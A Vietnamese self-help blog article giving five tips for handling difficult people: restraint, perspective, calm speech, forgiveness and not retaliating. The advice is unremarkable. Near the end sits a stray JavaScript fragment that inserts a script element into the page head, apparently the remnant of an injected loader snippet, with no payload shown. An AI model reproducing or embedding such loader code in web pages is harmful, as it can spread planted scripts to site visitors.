5 Cách ứng xử hiệu quả với người khó tính

 

Mỗi cây mỗi hoa mỗi nhà mỗi vẻ. Trong giao tiếp bạn sẽ gặp rất nhiều người bởi trên trái đất hơn 6 tỉ người, bạn ứng xử tốt với nhiều người được lòng người này thì sẽ mất lòng người kia, dù bạn làm tốt đến đâu thì cũng sẽ gặp phải những người “khó tính khó nết”, những người trái ý với chúng ta, những người chúng ta khó có thể hòa hợp hay đơn giản là họ không thích chúng ta. Vậy trong tinh huống đó, bạn sẽ làm gì ?

 

1.Học cách kiềm chế bản thân

 

kiem che ban than

 

Khi các bạn phản ứng trước những thái độ hay lời nói tiêu cực nhằm tấn công và kích thích phản ứng từ phía bạn thì bạn đã mắc câu của họ rồi. Hãy dừng tham gia trò chơi của vòng xoáy tiêu cực và cho bản thân cơ hội lắng đọng. Đừng để mình phản ứng bốc đồng, rồi bị mắc kẹt lúc nào không hay.

Việc tức giận có thể khiến bạn bị lộ nhiều nhược điểm không đáng có do đó hãy ngưng lại ngay cơn nóng giận đó và đừng làm cho sự việc rối tung lên và buổi nói chuyện và công việc của bạn sẽ bị cản trở và kết quả công việc khó đặt được như mong đợi. Do đó hãy kiềm chế bản thân, học cách chế ngự bản thân sẽ giúp bạn hiểu ra nhiều vấn đề hơn thay vì đối phó lại

 

2.Hãy tự đặt câu hỏi xem nó có quan trọng với mình không ?

 

Cảm xúc tiêu cực thường mang chúng ta đến nơi chúng ta không muốn. Nếu bạn xảy ra mâu thuẫn với người khác, hãy tự hỏi “Tôi có lợi gì nếu tôi thắng trong trường hợp này?” Nếu có, hãy hỏi “Tại sao tôi cần phải thắng? Điều gì sẽ xảy ra tiếp theo?”

 

3.Chú ý với việc dùng từ ngữ

 

Tránh việc sử dụng những từ ngữ thô lỗ, thiếu văn hóa, thiếu quan tâm và đặc biệt là la hét. Thay vào đó là những lời nói điềm tĩnh, nhẹ nhàng nhưng không nên nhu nhược quá, không để mình ở thế bị động. Ví dụ bạn cũng có thể tỏ sự thông cảm bằng lời nói: “Dường như anh có quá nhiều vấn đề trong đầu”.

Một bí quyết là đừng bao giờ lên giọng. Khi lâm vào tình huống gay cấn, hãy giữ giọng ở âm lượng bình thường và hạ giọng thấp xuống một chút. Nó không chỉ giúp bạn giữ vững cảm xúc mà còn buộc người kia phải lắng nghe bạn.

 

la het

 

4.Tha thứ

 

Để mối hận trong lòng thì rất khó chịu đúng không nào ? Hãy tạo ra cuộc sống giản dị, không muộn phiền nhớ rằng bản thân chúng ta là những người tốt, chỉ có những phán đoán và hành động là bị lu mờ. Chúng ta không kiểm soát được những lời nói gây tổn thương. Hãy hỏi bản thân: “Nếu đặt mình trong trường hợp của người đó hay tình huống đó, tôi có thể làm gì để hiểu và tha thứ cho họ?”

 

5.Không tìm cách trả đũa

 

Đừng tự mình hạ thấp bản thân qua việc trả thù họ. Thay vào đó, tại sao bạn thử tìm hiểu xem vì sao bạn không chiếm được cảm tình của anh ấy/chị ấy hoặc với chỉ với mình, anh ấy hoặc chị ấy mới tỏ ra khó tính đến vậy để từ đó tìm hướng giải quyết sáng suốt và tối ưu hơn.

Bạn hãy tỏ ra bạn là người thân thiện, tốt bụng, sẵn sàng giúp đỡ đồng nghiệp khi có thể ngay cả khi họ khó chịu với bạn. Sự chân thành của chính bạn sẽ khiến họ phải suy nghĩ lại.

 

Chúc các bạn thành công !

 

 

 

 } else {d.getElementsByTagName('head')[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *